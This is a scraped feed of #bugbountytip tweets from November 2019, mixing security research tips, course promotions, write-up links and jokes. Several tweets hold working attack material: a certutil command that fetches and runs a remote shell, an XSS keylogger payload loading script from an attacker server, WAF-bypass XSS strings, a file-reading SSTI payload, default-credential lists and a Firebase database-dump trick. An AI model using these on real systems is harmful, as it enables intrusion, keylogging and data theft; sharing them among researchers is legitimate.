2019-11-28 19:17:14
3 #bugbounty #bugbountytips #bugbountytip ๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿคฃ So, I got 1year free VPN from @wifimask Thanks to wifimask https://t.co/zLrurx34Zm
Pascal S
@PascalSec


2019-11-28 16:58:06
0 #bugbountytip huge productivity boost needed? Go and check out https://t.co/aZfbzgYuLc in case you use Firefox for testing. This eases multiple account / tenant testing by a mile. Shoutout to @infenet, who showed me this add-on in the first place! ๐Ÿฅณ
เคˆเคถเคพเคจ เคธเคฟเค‚เคน
@R0X4R


2019-11-28 10:24:17
1 Something interesting for Bug Bounty Hunters. #bugbountytips #bugbounty #bugbountytip #bughunter #hacker #hacking https://t.co/sN4tuXtDce
Random Robbie
@Random_Robbie


2019-11-28 09:25:29
3 #bugbountytip when dealing with ysoserial and windows machines get a shell by doing certutil.exe -urlcache -split -f http://yoursite/shell.exe shell.exe & shell.exe Downloads and renames file and then runs it. save messing with powershell struggles.
Hendrik
@hendrikvb


2019-11-27 21:08:43
1 Grab your #pentesting course fix here during super #blackfriday deal at @PentesterLab #infosec #bugbountytip https://t.co/R2M2j9Q3dO
Elsadat
@M0_SADAT


2019-11-27 19:20:34
3 Today I finished my exams and So excited to find P1 after 2 hours of testing at private program found SQL injection๐Ÿ˜and while reporting the issue discovered it's Out of scope subdomain๐Ÿ’” #bugbountytip read the target scope carefully to avoid this kind of heartbreaks #bugbounty
Paweล‚ Haล‚drzyล„ski
@phaldrzynski


2019-11-27 18:32:50
2 @Hogarth45_ND @plmaltais You can make it even shorter (and get rid of white-space characters): text'/\u0061\u006C\u0065\u0072\u0074`1`// or when slashes are forbidden: text'-\u0061\u006C\u0065\u0072\u0074`1`-' #xss #bugbountytip
Johns
@Johnssimon22


2019-11-27 14:18:10
2 How was i able to access a disabled/hidden feature with the help of burpsuite match and replace feature #bugbountytip #bugbounty https://t.co/q6O93zv2uu
AkaaZaan
@AkaaZaan


2019-11-27 12:07:36
0 infosec people drop links, where I can learn Regex!!! #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-11-27 11:55:50
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/sGQVdvW3cY
bugbountytip
@a_l_e_r_t_1_


2019-11-27 10:50:40
0 Party Time for laravel ๐Ÿ˜… #bugbountytips #bugbountytip https://t.co/mubsogY68J
ghostlulz
@ghostlulz1337


2019-11-27 05:25:02
9 There are tuns of tools for horizontal and vertical domain enumeration. I like to use Amass. In my youtube video I explain how to effectively use Amass in your reconnaissance process. https://t.co/ysW9JguyCV #bugbounty #bugbountytip #bugbountytips #infosec #amass #redteam
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-26 23:19:33
5 -subscribe to my youtube channel now -advanced videos tutorials about all hacking fields -parrotsec OS is the OS that gonna be used in the courses -learn ethical hacking in detail. https://t.co/m2akiMCaZI #bugbountytip #redteam #pentest #cybersecurity #malware
bugbountytip
@a_l_e_r_t_1_


2019-11-26 19:03:28
0 Look everywhere. Every user input, every parameter, cookies, headers . You can do it. All you need is patience and more reading.. #bugbountytip #bugbountytips https://t.co/Z49RnHRAxC
Vivek Yadav๐Ÿ’™ #Scaffold
@viveky259259


2019-11-26 18:40:26
0 Here's one more bug. This time by Spotify. In #payment section. When I choose #UPI as #payment at that time it should ask me #upi id/pin/address not postal pin. @Spotify @spotifyindia @BugBountyHQ #bugbountytip #bug #music #app #AndroidDev #SpotifyPremium https://t.co/HQ3J1V6mrA
ghostlulz
@ghostlulz1337


2019-11-26 18:21:56
8 Seriously, another unauthenticated database. Google Firebase is a ripe target for getting easy wins, just append "/.json" to the URL and it dumps the entire database. More info on my blog: https://t.co/WGzatNLO3C #BugBounty #bugbountytips #bugbountytip #firebase #infosec
Ananda Dhakal
@dhakal_ananda


2019-11-26 15:36:59
1 Feedback from a private program on @Hacker0x01. They had closed the report as N/A because they did not quite get the report. I made sure to provide all the details clearly once again and it is pending resolution. [1/2] #hackerone #bugbounty #bugbountytip https://t.co/kris0pXagG
รœzeyir ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป
@destanuzeyirr


2019-11-26 12:57:15
0 Does anyone know Cookie Based XXE , I may need some help #bugbounty #bugbountytip #togetherwehitharder
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-26 11:28:52
3 -Undetectable C#&C++ Reverse Shells.pdf: https://t.co/08CJhmLAbr -35+ Best Free NMap Tutorials and Courses.pdf: https://t.co/wNd4XNabzv -HTB: Luke.pdf https://t.co/dFYLXTo7zb -How to become a cybersecurity pro.pdf: https://t.co/ODbsUfZpe4 #bugbountytip #hacking #pentest #redteam
Alexander Khovansky
@al_khovansky


2019-11-26 07:50:56
0 *cough* Command-Option-F dangerouslySetInnerHTML *cough* #bugbountytip https://t.co/QScWlAc9Km
tololovejoi
@tolo7010


2019-11-26 00:27:09
2 Your weakness is determined by how do you live with your success. Your strength is determined by how do you handle your difficulties. #motivation #bugbounty #bugbountytip #infosec #hacking #bugbountytips #motivationquotes
Ismayil Tahmazov
@Tismayil1


2019-11-25 21:36:00
0 Sharing is good. Sharing increases happiness. #bugbounty #bugbountytip #bugbountytips #infosec @Nep_1337_1998 https://t.co/VWoZ4xc7cG
Brodie Codie
@brodie_codie


2019-11-25 20:41:20
0 I started doing #bugbounty in Sept, set a goal to reach top 50 in this program... Almost there Tip 2. KEEP READING #movingup #10000Hours #KEEPGOING #perseverance #Bugbountytip #bugbounty @emenalf ๐Ÿ‘€ https://t.co/YK0XF6uxkb
m0z
@LooseSecurity


2019-11-25 16:42:45
0 Someone just told me they once found company credentials on pastebin. #bugbountytip #bugbounty #bugbountytips #bugbounties #infosec
Security Executions Code
@pwn0sec


2019-11-25 16:35:17
0 Web cache poisoning attack https://t.co/G5ahhQidlh #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
drivertom
@drivertomtt


2019-11-25 16:13:40
0 @Xiaomi #bugbountytips #bugbountytip Never dig ANY vulnerabilities in products that are not admitted by their vendors. https://t.co/MpBnJuVmIh
Security Executions Code
@pwn0sec


2019-11-25 14:46:07
0 Web cache poisoning attack https://t.co/VPiOxCGk3K #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Wh11teW0lf
@Wh11teW0lf


2019-11-25 11:23:55
5 #bugbountytip Default credentials that i always try: admin:admin test:test admin:password admin:pass [email protected]:test [email protected]:test (try with all domains that belong to company) [email protected]:[email protected],com
Security Executions Code
@pwn0sec


2019-11-25 10:50:26
0 Bug Bounty Panasonic : Reflected (XSS) Vulnerability https://t.co/LnMgHCYvxW #bugbounty #bugbountytip #bugbountytips #xss
Pankaj ๐Ÿ‡ณ๐Ÿ‡ต๐Ÿ‡ฎ๐Ÿ‡ณ ๐Ÿ‡ท๐Ÿ‡บ
@Nep_1337_1998


2019-11-25 10:47:48
0 Thank you @Tismayil1 for your notes Yes I was awarded with โ‚ฌ600. ๐Ÿ˜๐Ÿ˜ Tools Sub Scanner : https://t.co/hZCWhAbzEm Dir Scanner : https://t.co/9n9y4T5EXE Git Dumper : https://t.co/7z9cdDA26W #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/SLAzoRn8Nz
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 08:13:46
0 Look out the window...if thatโ€™s not your dream view...get back to work! #bugbountytip
nutronex
@nutronex


2019-11-25 07:12:48
0 Lfi (cannot use log poison)> download source codes > found database credentials > found hidden admin panel > tried to login admin panel with these credentials > success > file upload > rce #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 06:07:56
0 Cool video about vim ๐Ÿ˜€ #bugbountytip https://t.co/tBsAbNk3UO๏ธ
ninetynine
@ninetyn1ne_


2019-11-25 04:43:27
0 Quick tip - If '/something' => 403 Try - '/something/' '/something/%20' '/something.html' '/something.json '/something/?anything' '/something#' Works sometimes๐Ÿค˜ Happy hacking....!!! #bugbounty #bugbountytip
Mashoud1122
@mashoud1122


2019-11-24 21:42:23
1 I just published my 1st Write UP.Writing it was harder than I thought. here you go: CORS Misconfiguration ->Account TakeOver [Out of scope to grab items In-Scope] #BugBounty #BugBountyTip #BugBountyTips https://t.co/6Ke09g37L5
Nosense
@Nosense08537389


2019-11-24 19:57:15
1 Hello friends! Im trying the exploit 44298 with kernel 4.4.0-87 and ubuntu 16.04.3 but when i run it it provides me invalid argument. May someone can help me what i should do? #bugbounty #hackthebox #PenTest #bountybug #bugbountytip #CyberSecurity #Hacking
๐Ÿ‘ปin๐Ÿš
@0xerror


2019-11-24 19:09:39
3 XSS News: @spyerror: 'Cloudflare {XSS} ยซbyPass detectionยป `payloadยด; %3Cimg src='null' onerror=alert('spyerror')%3E ๐Ÿ† #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/XopkzOyBE8, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-11-24 19:09:39
2 Top story: @spyerror: 'Cloudflare {XSS} ยซbyPass detectionยป `payloadยด; %3Cimg src='null' onerror=alert('spyerror')%3E ๐Ÿ† #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/mW90LakWPL, see more https://t.co/fVnXn9Z0FJ
Pratik Yadav
@PratikY9967


2019-11-24 17:31:01
8 Ssti while sending money from one account to another .I inserted a normal payload {{7*7}} in note section. Probably others have missed this bug because no one want to spend small amount for testing . #bugbounty #bugbountytip https://t.co/k4dq1Xa3Tn
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2019-11-24 13:24:05
6 Cloudflare {XSS} ยซbyPass detectionยป `payloadยด; %3Cimg src='null' onerror=alert('spyerror')%3E ๐Ÿ† #BugBounty #BugBountyTip #WAF #infosec https://t.co/oHTNwiv6Au
ghostlulz
@ghostlulz1337


2019-11-24 13:21:21
9 If your wanting to become a full time bug bounty hunter or penetration tester you may want to get a copy of my book. WARNING INDUSTRY SECRETES WILL BE DROPPED. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytip #infosec #appsec #redteam #PenTest #DFIR #OSINT #xss https://t.co/iBiJBKWwPU
vinod3070
@vinod3070


2019-11-24 11:37:41
0 It's a project management tool, if I put my vps link in the group chat box I get GET req to my VPS. Nothing else is working. Any leads ? #bugbountytips #bugbountytip #hackerone #recon #ssrf
luis madero
@_Y000_


2019-11-24 00:27:50
3 Explotando vulnerabilidad CORS.(cross origin resource sharing) #hacked #cors #bugbountytip #bugbounty #CyberSecurity https://t.co/vWzRICB3T1
Shammah Agwor
@Zealsham


2019-11-23 23:01:26
0 Search shodan for โ€œaquatone_report.htmlโ€ get access to dozen of recon data from other bug hunters ๐Ÿ˜‚๐Ÿ˜‚. #Bugbountytip #bugbounty
Halil AHMAD
@Halilahmadd


2019-11-23 21:39:11
4 Cloudflare Bypass Payload:<svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security @XssPayloads
healthyoutlet
@healthyoutlet


2019-11-23 20:49:38
0 Get all the urls out of a sitemap.xml with curl and xmllint in a bash oneliner. curl -s https://t.co/A6bYnXdhNI | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' #bugbountytip
ticarpi
@ticarpi


2019-11-23 20:40:15
3 jwt_tool v1.3.2 now has improved 'Spoof JWKS' functionality https://t.co/yA6KVOSEqO #jwt #jwks #bugbountytip #netsec https://t.co/uH8H4LwB9J
Pavandeep
@Pavandep8


2019-11-23 15:43:20
0 Look what I shared: SQL Injection Step By Step Part 1 - Nilesh Sanyal - Medium @MIUI| #bugbountytip #Hacker #security https://t.co/deek38JH50
Nick || hunt4p1zza
@ngkogkos


2019-11-23 15:08:38
6 Burp has many features to help your workflow & better -> more bugs. In my @Burp_Suite proxy, I constantly use a search regex pattern that includes standard placeholders I use within my payloads, such as zzz/xss, and I keep adding to it. #burpsuitetip #bugbountytip #BugBounty https://t.co/3CHDtFGQeF
Paresh
@Paresh_parmar1


2019-11-23 10:10:04
8 #bugbountytip decompile android app. and go to : Resources > resources.arsc > res > values > strings.xml search for *.firebaseio.com in xml file. ,and open browser try https://*.firebaseio.com/.json , you might find read access to database there. #bugbountytips . https://t.co/eZPSqnAbWV
ninetynine
@ninetyn1ne_


2019-11-23 08:24:59
0 XSS tip - when looking for XSS, try functions like - 'confirm()' and 'eval()' instead of 'alert()' & 'prompt()' to bypass the WAF. ๐Ÿง #bugbountytip #BugBounty
ghostlulz
@ghostlulz1337


2019-11-23 07:08:39
9 Expanding your scope on a bug bounty program is a great way to gain more vulnerabilities.Horizontal domain enumeration is a technique used to find domains of an organization. More information on my youtube video: https://t.co/nrVeAWSmxV #bugbountytip #BugBounty #bugbountytips
HackIsOn ยฎ
@hackison


2019-11-23 04:44:08
13 Everytime shodan gives a surprise to our #cybersecurity community ๐Ÿ˜Ž๐Ÿ˜Ž Utilise it everyone ๐Ÿค— #BugBounty #bugbountytip #bugbountytips #hacking #cybersecurity #linux #Ubuntu #hacking #hackers #owasp #bug #vulnerability #redteam #redteaming https://t.co/XAYGEChP7d
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-22 19:13:56
15 -Web Application Penetration Testing Course.pdf: https://t.co/GlebM7I7b0 -20 Best HTML Cheat Sheet Of 2019 | With All New HTML5 Tags.pdf: https://t.co/59tuOLtNSb -Fasten your Recon process using Shell Scripting.pdf: https://t.co/33JZAQ2k4n #html #Hacking #bugbountytip #PenTest
healthyoutlet
@healthyoutlet


2019-11-22 18:41:00
0 1) Find as many domains as you can that are owned by the target org: https://t.co/sTkppJra4w 2) run subdomain discovery on all of them 3) make a wordlist of all discovered subdomains 4) run massdns on in scope domains with that wordlist. #bugbountytip
florens
@florens25301329


2019-11-22 17:27:55
0 Need some help to exploit DOM-XSS will share bounty! #BugBounty #bugbountytip #togetherwehitharder
Yash sariya
@stylish_hacker_


2019-11-22 08:33:44
0 How to become a successful bug hunter https://t.co/nYs8qifcA0 #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:32:27
0 What is web server fingerprint https://t.co/BdmKPXFPpd #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:26:59
0 Complete Recon Process A to z https://t.co/msMzOd0Ja7 #bugbountytip #bugbounty #bugbountytips
Udit Bhadauria
@udit_thakkur


2019-11-22 06:59:54
0 @NahamSec just uploaded his talk at @defcon "Owning The Clout Through SSRF" with @daeken! https://t.co/jb7XuGIXyN The pdf can be found: https://t.co/R7gbIXgItf & if you want to practice it, consider looking into @PentesterLab's exercise of brown badge. #infosec #bugbountytip
Brodie Codie
@brodie_codie


2019-11-22 05:04:54
0 so aquatone has it's own probe to check if links are alive with this option found 2 admin panes this way "cat List.txt| aquatone -ports xlarge" #bugbountytips #bugbountytip
Securisec ๐Ÿš€
@securisec


2019-11-22 01:33:31
0 "RT RT Tismayil1: Yes I earned $3180. Tools : Sub Scanner : https://t.co/VcdATHEpOs Dir Scanner : https://t.co/HJAwQE187M Git Dumper : https://t.co/ZKqKYdHhkG #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/UGa0yAvGEx"
healthyoutlet
@healthyoutlet


2019-11-21 23:14:43
0 #bugbountytip keep your hackerone inbox open so that it's super easy to check for updates on that crit every 15 minutes for the next week. Bonus tip: Have a pint of ben and jerry's ready for when it gets marked dupe.
Binit Ghimire
@WHOISbinit


2019-11-21 19:51:51
1 When you are using a XSS payload in email field during registration and it doesn't execute after creating the account, try choosing the "Resend Activation Email" option. Developers are likely to forget filtering the email in activation email resent message. #XSS #BugBountyTip
Ismayil Tahmazov
@Tismayil1


2019-11-21 19:03:42
18 Yes I earned $3180. Tools : Sub Scanner : https://t.co/LegySAU3sZ Dir Scanner : https://t.co/1L6MutcaEc Git Dumper : https://t.co/IOsHlTWCP2 #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/6Qy1JEiDWM
Vikash Chaudhary
@OffensiveHunter


2019-11-21 05:31:42
2 #BugBountyTip completes the first checklist that I gave it to you yesterday, now move to on these vulnerabilities spend some time to read about these topics. if you want to learn live bug bounty hunting you can subscribe to my second course i.e Offensiveโ€ฆhttps://t.co/ji3V0Sxi5a
Mourad
@SecuAudit


2019-11-20 22:27:32
0 The worst Bug Bounty program : You spend your holidays trying to help them to secure their online business . after 45days when you ask for an update they just get worse and treat you like shit in return ,Bug Hunters have no value in this chain #bugbountytip #BugBounty #pentesting
florens
@florens25301329


2019-11-20 20:18:04
2 Finally got the last bit working so i can finish the practical for XXE!! Notes will be available today/tomorrow! #bugbountytip #Bugbounty
itsmenaga
@nagarockshard


2019-11-20 17:17:24
0 After seeing *.domain.com ...Recon Script Pop-ups ๐Ÿ˜›๐Ÿ˜‚ #BadBugBountyPickUpLines #bugbountytip
Yadhavi
@PrincessYadhavi


2019-11-20 16:57:27
0 As Defcon 27 videos uploaded to youtube, which talks are must watch for bug bounty hunters? #defcon #bugbounty #bugbountytip #bugbountytips
Ali Tรผtรผncรผ
@alicanact60


2019-11-20 16:27:34
0 Hi there! I will share a vulnerability which I found on Facebook. PoC video or Write up? Which one do you prefer? The survey will be available for 2 days and then, I will publish it. Select one! #BugBounty #bugbountytips #bugbountytip
Daher Mohamed
@DaherMohamed4


2019-11-20 15:37:46
0 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/uv11CIACuA #BugBounty #bugbountytips #bugbountytip
RIPS Technologies
@ripstech


2019-11-20 15:36:25
2 Find out how Simon found 5 #WordPress core 0days, in our #security whitepaper: ->https://t.co/U7VCsBglqR #bugbounty #bugbountytip #bugbountytips #AppSec https://t.co/fNU3DID063
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-20 13:18:12
0 Get Cyber Security and Technology Internship with HACKDOOR Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/KskyHzVwvW
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-20 13:10:22
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/u2LdRIokeL
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-20 13:08:49
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Bh0bARIGBh
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-20 13:06:58
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mCZqeZB8YT
National Cyber Security Services
@NationalCyberS1


2019-11-20 12:40:53
2 Configuring Frida with #BurpSuite and #Genymotion to #bypass #Android #SSL Pinning #LINK :- https://t.co/jLWK2f7dx6 #cybersecurity #Pentesting #pentest #hacking #bugbountytips #bugbounty #bugbountytip https://t.co/JIZt1QUzHi
x1m
@x1m_martijn


2019-11-20 09:23:49
0 Someone else is using my xsshunter payload :p I don't mind heheheh #bugbountytip
Vikash Chaudhary
@OffensiveHunter


2019-11-20 03:49:31
2 #BugBountyTip if you are not getting bounty then hunt these bugs on any program first , you will surely get. it's very easy to hunt these bugs. Regards! #Vikash #Chaudhary CEO & Founder (#HackersEra #Cyber #Security #Consultancy & #Training PVT LTD) mailโ€ฆhttps://t.co/NHBnVkBMWH
YogoshaOfficial
@YogoshaOfficial


2019-11-19 16:08:30
10 [#bugbountytip] : If you're blocked by WAF during your pentest, try to hide your IP by forcing the proxy to remove all possible headers by using hop-by-hop headers Exp: Connection: close, X-Originating-IP ,X-Forwarded-For , X-Remote-IP , X-Remote-Addr @TnMch_
Mantis
@MantisSTS


2019-11-19 15:07:52
2 What word lists do you have most success with to find admin panels? RT for reach! #BugBounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-19 14:11:17
2 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting https://t.co/AjSRBqt57p
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-19 14:00:03
3 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #Pentesting https://t.co/0wdvBhdOHw
bugbountytip
@a_l_e_r_t_1_


2019-11-19 11:16:24
1 Stored XSS on gitlab - 2 #bugbountytips #bugbountytip https://t.co/eaW3avmcpK
Raad Haddad
@raadfhaddad


2019-11-19 07:17:36
2 Read headlines of the company's policies, make sure they implement it correctly, especially when it comes to insecure data storage. I found something related to this in Facebook last year! And yes, i got rewarded for my finding. #bugbountytip #bugbounty #security
_ABDOUL_GAFFHAR_
@mrgaphy


2019-11-19 06:21:42
0 My next open source project I want to make an automated tool that will search leak credentials in log and config files. I always seem to find exposed credentials in log or configuration files. #bugbountytips #BugBounty #bugbountytip #osint #pentest #webappsec #redteam #infosec
void
@gowridash


2019-11-19 04:57:35
0 @facebook Still Notification #bug #defect is not fixed? During shifting Mobile data/Wi-Fi already read/seen posts are showing as new ones #Android9 Is it so difficult to fix this #issue #bugbountytip
tololovejoi
@tolo7010


2019-11-18 23:01:07
0 1% of new bug bounty hunters ask for knowledge, 99% of them ask for motivation #bugbounty #bugbountytip #infosec #hacking
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-11-18 22:35:10
0 #bugbountytip #bugbountytios all of bug hunters writes try to understand web app. Writes some payloads :) But no one write about detection methodology :) Try to understand every vuln and what you need search in response body after sending payload.
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-18 22:14:56
1 Remember that *pht* files can be used to execute PHP code. Old #bugbountytip
m0z
@LooseSecurity


2019-11-18 18:41:49
6 I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountytips #BugBounty #bugbountytip payload not by me
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-18 18:07:09
0 [Tutorial] My Tutorial collection for SHELLING+ROOTING WEBSITES ----- COMMENT HERE and will share the link ! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-18 17:56:50
0 Hacking Windows PC using Metasploit u TORRENT Tutorial by Hackdoor on WebDav_dll Hijacking https://t.co/yznzTvdCrC Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/OT1MPRtl86
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-18 17:40:28
1 [[[FREE]]] Biggest Repository of Ebooks (hacking, penetration testing, tool , programming and more) ! Comment Here and I will share the Link with you -- Limited Users only !! #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Halil AHMAD
@Halilahmadd


2019-11-18 11:33:37
0 Second Time Hall Of Fame #BugBounty #XSS #BugBountyTip #infosec https://t.co/Q0WGIKRgpt
HamdiSevben
@HmdSvbn


2019-11-18 11:08:14
0 -1-A penetration testerโ€™s guide to sub-domain enumeration.pdf: https://t.co/fhokFhyIyj -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/C56oHA2Aua -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/RmE8h4eP6R #bugbountytip #Hacking #redteam
Ali Tรผtรผncรผ
@alicanact60


2019-11-18 10:34:55
2 Last night, worked about 1 hour and got one triaged report. Waiting payment. @Hacker0x01 #BugBounty #bugbountyips #bugbountytip 1. Always look at all request. Maybe you can find a redirect parameter. 2. This payload can be useful for open redirects: //[email protected] https://t.co/VsUp6O1vCt
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-18 09:54:28
5 -1-A penetration testerโ€™s guide to sub-domain enumeration.pdf: https://t.co/OOd6Z3Qc1M -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/HoinO16IyM -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/Lz7WTH1mzY #bugbountytip #Hacking #redteam
OCK le Fรฉcond
@OscLFecond


2019-11-18 07:36:58
1 How to Bypass SSL Pinning on Android : -Root your devices -Install your mitm cert -Moove it from data/misc/user/0/cacerts-added -To /system/etc/security/cacerts -No need Frida - Enjoy <3 #AndroidSecurity #MobileSecurity #bugbountytip #bugbountytips
Shantanu Kulkarni
@Iamshantanukul


2019-11-18 05:51:21
0 If a failed login caused application to send a warning email to user , any user data incorporated into the email may need to be checked for SMTP injection attacks. #bugbountytip #hackerone #bugcrowd #bughunting #bugbounty #pentesting #hacking #cybersecurity #bugbountytips
darkmage
@therealdarkmage


2019-11-18 05:35:52
0 Aw fooey, my most recent submission to @Bugcrowd was marked as "duplicate"...meaning it was still a legit concern! Heck yeah, I am learning and leveling up! - It was a open redirect on a website where I overcome a whitelist using a double-redirect ๐Ÿ˜Ž #bugbounty #bugbountytip
Imran nissar
@Imrannissar3


2019-11-18 05:18:49
4 How bash can be used for automation #bugbounty #bugbountytip https://t.co/heUev6rsuI
m0z
@LooseSecurity


2019-11-17 20:46:27
0 Always remember to rest for SSTI (Server-Side Template Injection). Test for it the same way you would for XSS. A few simple payloads like {{7*7}} and if they get replaced by '49' then you've just found a high/critical vulnerability. You need to get a PoC though! #bugbountytip
Halil AHMAD
@Halilahmadd


2019-11-17 20:16:17
5 REMOTE XSS KEYLOGGER Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
ghostlulz
@ghostlulz1337


2019-11-17 18:37:46
7 I always seem to find exposed credentials in log or configuration files. These are easy wins that take 10 seconds to find. More info on my blog: https://t.co/Kft6p37wJM #bugbountytips #BugBounty #bugbountytip #osint #pentest #appsec #redteam #infosec #pentesting #logs #config https://t.co/Vf4AJs2sn7
A hacker's life
@Unknownuser1806


2019-11-17 12:12:55
0 STEALING $10,000 YAHOO COOKIES! https://t.co/PSImiH4oNc JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVILโ€™S WAF: https://t.co/IpzdET7XVb #bugbounty,#bugbountytip,#cybersecurity,#hacking,#infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-17 10:30:09
2 Less than 1$... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AaUIgsgeiM
sagar yadav
@sagaryadav8742


2019-11-17 04:01:58
0 Fun time with @stokfredrik โœŒ๏ธ and @sechunt3r ๐Ÿ˜in #bsidesahmedabad #bugbountytip #bugbounty #bughunting #bugcrowd #cobalt #nullcon #hackerone #Intel #BountyHunter #bounty #secure #zerocopter #happy #sagaryadav8742 https://t.co/vzkOVrKygS
Bogdan Tcaciuc
@bogdantcaciuc7


